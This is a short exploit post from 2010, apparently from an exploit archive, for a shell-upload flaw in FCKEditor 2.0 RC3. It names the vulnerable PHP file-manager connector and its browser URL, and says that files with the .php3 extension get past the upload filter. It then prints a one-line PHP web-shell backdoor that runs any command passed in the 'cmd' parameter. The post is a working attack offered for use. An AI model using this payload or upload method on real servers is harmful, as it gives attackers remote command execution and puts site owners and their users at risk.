Home / os / winme

FCKEditor Version 2.0 (Release Candidate 3) Shell Upload Exp

Posted on 17 March 2010

================================================================ FCKEditor Version 2.0 (Release Candidate 3) Shell Upload Exploit ================================================================ FCKEditor Shell Upload Exploit ------------------------------ Web-App: FCKEditor. Version: Version 2.0 RC3 (Release Candidate 3). Link : http://sourceforge.net/projects/fckeditor/files/FCKeditor/ Author : Aodrulez. Email : f3arm3d3ar@gmail.com Vulnerable File : ----------------- http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connector.php Vulnerable Link : ----------------- http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php Exploit : --------- You can upload a php backdoor with this extension: .php3 Sample Backdoor:(save as "any_name.php3") ----------------------------------------- <? system($_GET["cmd"]); ?> # ~ - [ [ : Inj3ct0r : ] ]

 

TOP